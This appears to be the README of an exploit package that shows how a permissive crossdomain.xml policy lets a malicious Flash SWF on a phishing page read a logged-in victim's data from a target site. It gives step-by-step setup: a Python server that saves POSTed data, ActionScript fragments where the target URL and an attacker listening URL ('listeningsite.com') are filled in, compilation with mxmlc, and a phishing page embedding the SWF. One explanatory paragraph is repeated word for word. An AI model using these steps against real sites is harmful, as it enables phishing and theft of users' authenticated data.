Flash-like browsers use a same-origin policy to prevent external pages from accessing restricted resources. Browser developers, on the other hand, want a means to relax this policy when needed. To facilitate this, Adobe produced Cross-domain Policy Files, also known as crossdomain.xml
I have created this exploit, to demonstrate how a cross-domain policy file misconfiguration can compromise sensitive data.
The Phishing Website of the Attackers contains a malicious flash file, which the user opens. This website communicates with the website that has the Cross-Domain Policy Enabled settings enabled and searches for the crossdomain.xml file. The Attackers Phishing Website realizes that it can easily communicate with the website after reading the policy file. It reads the information and sends it to the Attackers Server. The flash file runs the script on the Cross-Domain Policy-enabled website and transmits data to the Attackers Server.
Over the Top
This exploit has been developed to demonstrate how a cross-domain policy file misconfiguration can compromise sensitive data.
The Phishing Website of the Attackers contains a malicious flash file, which the user opens. This website communicates with the website that has the Cross-Domain Policy Enabled settings enabled and searches for the crossdomain.xml file. The Attackers Phishing Website realizes that it can easily communicate with the website after reading the policy file. It reads the information and sends it to the Attackers Server. The flash file runs the script on the Cross-Domain Policy-enabled website and transmits data to the Attackers Server.
How-To
The following package has the necessary files to test this exploit in one’s environment:
https://github.com/NavidNaf/CrossDomain-XML-Exploit
In this project, the exploit package targets websites with crossdomain xml configuration issues. This package contains the following files:
A webserver creating instance. If this file is run, a simple http webserver starts listening to a given port. Run the python file as follows:
python webserver.py [PORT NUMBER]
Specify python3 if you are on a mac/linux device. The webserver implements a POST request recieving technique. A post request to this webserver will recieve the Posted data and will save it to an external serverResponse.txt file.
This is an action script code that can be rendered into swf, to be later embeded into an html file. Change the following code-portions:
public class crossDomainExploit extends Sprite {
........
var readFrom:String = "https://targetsite.com";
Change the URL, to your designated targeted URL. The URL to retrieve the data from.
private function eventHandler(event:Event):void {
var sendTo:String = "http://listeningsite.com"
Change the listening URL, to your created webserver URL or your any deployed listening site. The URL where data will be posted through the swf.
How to Render SWF?
- Download Apache Royale (https://royale.apache.org/)
- Compile the .as file with mxmlc.
mxmlc ~/path/to/your/file/crossDomainExploit.as
A phishing site will also have to be created embeding the swf file, so that when the page is loaded, it can retrieve data from the target site.
Extras Directory
- crossdomain.xml: Sample of Vulnerable Cross-Domain-Policy File.
- index.html: Samle phishing file, with swf embeded.
Dependencies
- swf has now been obsolete. Only works in legacy platforms.
- The target site needs to be logged into, at the time of openning the phishing URL, to retrieve the target URLs data.